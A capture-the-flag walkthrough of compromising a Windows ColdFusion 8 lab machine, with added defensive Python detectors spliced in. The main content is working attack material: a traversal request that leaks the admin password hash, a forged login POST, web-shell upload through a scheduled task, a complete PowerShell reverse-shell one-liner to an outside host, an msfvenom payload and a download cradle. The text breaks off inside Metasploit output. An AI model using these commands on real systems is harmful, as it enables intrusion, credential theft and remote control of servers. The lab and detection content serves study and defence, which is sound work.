Without further ado, let's get started:
The first step is to run Nmap against the machine:
# Nmap 7.80 scan initiated Sat Sep 19 14:54:46 2020 as: nmap -sV -O -sC -p- -oN scan 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.021s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 19 15:00:16 2020 -- 1 IP address (1 host up) scanned in 329.63 seconds
From the output we can see that MSRPC is running on 135 and 49154, and that FMTP may be on port 8500. I took a closer look at port 8500; browsing to it showed that it was running Adobe ColdFusion, and browsing to the administrator login page showed that it was running version 8.
http://10.10.10.11:8500/CFIDE/administrator/index.cfm
nets.ec provides a good resource on ColdFusion hacking, including logging in to the administration panel using a local file disclosure vulnerability. As described on that site, the first step is to use the LFI vulnerability to view the password.properties file by browsing to the following location:
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=…\ColdFusion8\lib\password.properties%00en
This then shows us the hashed password value:
You then copy the hash into the password field and run the following JavaScript from the address bar:
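The request above is a classic directory traversal with a null byte appended so the server drops the "en" suffix it normally adds to the locale name. As an added example (not from the original post or from nets.ec), here is a small Python detector that runs over web-server access-log lines and flags requests carrying traversal sequences, embedded NUL bytes, or a reference to password.properties. It percent-decodes repeatedly so a double-encoded payload (the `%2500` form visible in the POST body later on this page) is caught as well. The log lines are constructed for the example; only password.properties is taken from the page.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log style); not taken from the original post.
SAMPLE_LOG = r'''
10.10.14.34 - - [19/Sep/2020:15:02:11 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 5120
10.10.14.34 - - [19/Sep/2020:15:03:40 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%5C..%5C..%5C..%5CColdFusion8%5Clib%5Cpassword.properties%00en HTTP/1.1" 200 1342
10.10.14.34 - - [19/Sep/2020:15:03:41 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 1342
10.10.14.34 - - [19/Sep/2020:15:04:02 +0000] "GET /CFIDE/administrator/enter.cfm?locale=%2e%2e/%2e%2e/etc/passwd%00 HTTP/1.1" 200 900
10.10.14.34 - - [19/Sep/2020:15:04:30 +0000] "GET /CFIDE/administrator/enter.cfm?locale=%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1" 200 900
'''

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A ".." path segment bounded by a slash, a backslash, or the start/end of the value.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
# File names whose appearance in a request parameter is suspicious on a ColdFusion 8 host.
SENSITIVE_FILES = ('password.properties',)


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%2500 -> %00 -> NUL) are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Return the sorted list of reasons a request target looks like a file-disclosure attempt."""
    reasons = set()
    decoded = fully_decode(target)
    # Inspect the path itself and every query-string value separately.
    path, _, query = decoded.partition('?')
    values = [path] + [kv.partition('=')[2] for kv in query.split('&') if kv]
    for v in values:
        if '\x00' in v:
            reasons.add('null byte')
        if TRAVERSAL_RE.search(v):
            reasons.add('directory traversal')
        if any(name in v.lower() for name in SENSITIVE_FILES):
            reasons.add('sensitive file name')
    return sorted(reasons)


def scan_log(text):
    """Return (line_no, method, target, reasons) for each suspicious request in the log text."""
    hits = []
    for n, line in enumerate(text.strip().splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reasons = classify_request(m['target'])
        if reasons:
            hits.append((n, m['method'], m['target'], reasons))
    return hits


if __name__ == '__main__':
    for n, method, target, reasons in scan_log(SAMPLE_LOG):
        print(f'line {n}: {method} {target}\n    -> {", ".join(reasons)}')
```

Decoding repeatedly, rather than once, is the part that matters: a single `unquote` turns `%2500` into the harmless-looking literal `%00`, and the NUL only appears on the second pass. On the server side the same defence applies in reverse: resolve the locale to a path, canonicalise it, and refuse anything that does not stay inside the expected directory.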
javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value))
This produces an alert containing the HMACed hash.
I then started Burp, set it to intercept HTTP traffic, and submitted the login form from the ColdFusion administration panel. The request had to be modified in Burp so that the cfadminPassword value matched the HMACed value reported in the JavaScript alert. My POST request looked like this:
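The JavaScript above reveals the design weakness that makes the leaked file sufficient to log in: the browser never sends a password, only HMAC-SHA1(salt, stored_hash), so the stored hash is a password-equivalent. The following Python is an added, simplified model written for this page (not ColdFusion's code and not from the original post): weak_server_check recomputes the same HMAC over the value it holds on disk, while make_verifier/strong_server_check show a verifier-based design in which the stored value alone cannot produce a valid login. The password, salt and function names are assumptions constructed for the example.

```python
import hashlib
import hmac
import os

# Constructed demo password and its SHA-1 hex digest, standing in for the value that
# password.properties would hold. Not the hash from the original post.
DEMO_PASSWORD = "correct horse battery staple"
STORED_SHA1_HASH = hashlib.sha1(DEMO_PASSWORD.encode()).hexdigest().upper()
PBKDF2_ROUNDS = 100_000


def client_proof(salt, stored_hash):
    """Model of hex_hmac_sha1(salt, cfadminPassword) from the page: the salt is the HMAC key
    and the (already hashed) password is the message."""
    return hmac.new(salt.encode(), stored_hash.encode(), hashlib.sha1).hexdigest()


def weak_server_check(salt, submitted, stored_hash=STORED_SHA1_HASH):
    """Server side of the weak scheme: recompute the HMAC over the stored hash and compare.
    Anyone who can read the stored hash can produce a valid proof without the password."""
    expected = hmac.new(salt.encode(), stored_hash.encode(), hashlib.sha1).hexdigest()
    return hmac.compare_digest(expected, submitted)


def make_verifier(password):
    """Hardened alternative: store a random salt and a slow PBKDF2 digest of the password."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


def strong_server_check(password, verifier):
    """Verify a submitted password (sent over TLS) against the stored verifier.
    The verifier is never accepted as a credential in its own right."""
    salt, digest = verifier
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


def demo():
    """Return (weak_accepts_hash_only, strong_accepts_hash_only, strong_accepts_password)."""
    salt = "1600000000000"          # constructed; the page's salt is a millisecond timestamp
    leaked = STORED_SHA1_HASH       # all a file-disclosure bug would yield
    weak = weak_server_check(salt, client_proof(salt, leaked))
    verifier = make_verifier(DEMO_PASSWORD)
    strong_with_hash = strong_server_check(leaked, verifier)   # hash presented as the password
    strong_with_pw = strong_server_check(DEMO_PASSWORD, verifier)
    return weak, strong_with_hash, strong_with_pw


if __name__ == "__main__":
    print(demo())   # (True, False, True)
```

The slow verifier also raises the cost of offline guessing if the stored value does leak, but it is a second line of defence: the first is not letting an unauthenticated request read files under the ColdFusion lib directory at all.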
POST /CFIDE/administrator/enter.cfm HTTP/1.1
Host: 10.10.10.11:8500
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en
Content-Type: application/x-www-form-urlencoded
Content-Length: 422
Connection: close
Cookie: CFID=100; CFTOKEN=75808739
Upgrade-Insecure-Requests: 1

cfadminPassword=AD8AC0F171DEEACB68EA99CF11A19C4E2CFC9C97&requestedURL=%2FCFIDE%2Fadministrator%2Fenter.cfm%3Flocale%3D..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CColdFusion8%5Clib%5Cpassword.properties%2500en&salt=1601344007175&submit=%23Wed+Mar+22+20%3A53%3A51+EET+2017%0D%0Ardspassword%3D0IA%2FF%5B%5BE%3E%5B%24_6%26+%5C%5CQ%3E%5BK%5C%3DXP++%5Cn%0D%0Apassword%3D2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03%0D%0Aencrypted%3Dtrue
After forwarding the modified POST request from Burp to the ColdFusion server, you are logged in successfully. I then continued following the guide to get a reverse shell on the machine. I opened the "Scheduled Tasks" menu on the left of the ColdFusion administration panel and created a new scheduled task. I wanted to upload the CFM shell that ships with Kali, which can be found at /usr/share/webshells/cfm/cfexec.cfm. I started a Python HTTP server on my Kali machine to host this shell with the following command:
python -m SimpleHTTPServer 8000
I then created the scheduled task in ColdFusion, making sure to enter the URL of the shell on my Kali machine and the location to save the shell to. That location can be found under Mappings.
I then submitted the scheduled task, ran it, and browsed to the location I had chosen to save the shell. I was greeted by the shell, which means the scheduled task had successfully downloaded and saved the shell from my Kali machine:
I then entered "c:\windows\system32\cmd.exe" in the command text box and the following command in the options box:
/c powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.34',2700);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" > C:\ColdFusion8\wwwroot\bs.txt
This creates a reverse shell back to my Kali machine on port 2700. I opened msfconsole and started a multi/handler on port 2700, then executed the PowerShell reverse shell from the ColdFusion web shell interface:
msf5 exploit(windows/http/rejetto_hfs_exec) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf5 exploit(multi/handler) > set lport 2700
lport => 2700
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.34:2700
[*] Command shell session 1 opened (10.10.14.34:2700 -> 10.10.10.11:54928) at 2020-09-28 13:07:26 -0400
PS C:\ColdFusion8\runtime\bin> cd /
PS C:\> cd Users
PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 22/3/2017 8:10 ?? Administrator
d-r-- 14/7/2009 7:57 ?? Public
d---- 22/3/2017 9:00 ?? tolis
PS C:\Users> cd tolis
PS C:\Users\tolis> cd Desktop
PS C:\Users\tolis\Desktop> ls
Directory: C:\Users\tolis\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 22/3/2017 9:01 ?? 32 user.txt
PS C:\Users\tolis\Desktop> cat user.txt
[REDACTED]
From the output you can see that it executed successfully and I was able to read the user flag.
The next step is privilege escalation. I first tried to upgrade the basic reverse TCP shell to a Meterpreter shell. I used msfvenom to create an exe that can be run from the current shell to spawn a Meterpreter shell.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.38 LPORT=2901 -f exe > 0005.exe
I then uploaded it to the Arctic machine with the following command:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.38:8000/0005.exe','0005.exe')"
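Both the reverse-shell one-liner used from the ColdFusion scheduled task earlier on this page and the WebClient download cradle just above share a telemetry footprint: a PowerShell process with a long inline command, spawned (directly or via cmd.exe) by the application-server process. As an added example, not from the original post, the Python below scores constructed process-creation events (Sysmon Event ID 1 style, trimmed to three fields) on those traits. The parent-process names, the indicator weights and the threshold are assumptions for the example; in particular it assumes ColdFusion 8 runs under jrun.exe, which matches the C:\ColdFusion8\runtime\bin working directory of the shell shown on this page.

```python
import re

# Constructed process-creation events; the command lines are shortened, non-working
# stand-ins modelled on the patterns discussed on this page.
EVENTS = [
    {"ParentImage": r"C:\ColdFusion8\runtime\bin\jrun.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'''cmd.exe /c powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.5',2700);$stream = $client.GetStream();iex $data"'''},
    {"ParentImage": r"C:\ColdFusion8\runtime\bin\jrun.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.0.0.5:8000/x.exe','x.exe')"'''},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -NoProfile -File C:\scripts\backup.ps1'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''powershell -nop -c "Get-Process | Out-File C:\temp\p.txt"'''},
]

# (label, pattern, weight): weights and the threshold below are example tuning values.
INDICATORS = [
    ("raw TCP client object", re.compile(r"Net\.Sockets\.TCPClient", re.I), 3),
    ("dynamic code execution", re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 3),
    ("download cradle", re.compile(r"WebClient\)?\.Download(File|String)", re.I), 3),
    ("profile-less or encoded launch", re.compile(r"\s-(nop|noprofile|enc|encodedcommand|w\s+hidden)\b", re.I), 1),
]
# Assumed web/application-server binaries that should rarely spawn shells.
SERVER_PARENTS = ("jrun.exe", "w3wp.exe", "httpd.exe")
THRESHOLD = 4


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    reasons, score = [], 0
    cmd = event.get("CommandLine", "")
    for label, pattern, weight in INDICATORS:
        if pattern.search(cmd):
            reasons.append(label)
            score += weight
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    if parent in SERVER_PARENTS:
        reasons.append("spawned by web/application server")
        score += 3
    return score, reasons


def triage(events, threshold=THRESHOLD):
    """Return (index, score, reasons) for every event at or above the alert threshold."""
    hits = []
    for i, event in enumerate(events):
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


if __name__ == "__main__":
    for i, score, reasons in triage(EVENTS):
        print(f"event {i}: score {score}: {', '.join(reasons)}")
```

The parent-process signal is deliberately weighted as heavily as any single command-line indicator: the `-nop` flag alone is common in legitimate automation (event 3 stays below the threshold), but a web application server launching PowerShell at all is worth a look regardless of what the command line says.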
I then started a multi/handler in Metasploit listening on port 2901 and executed the payload.
msf5 exploit(windows/http/rejetto_hfs_exec) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf5 exploit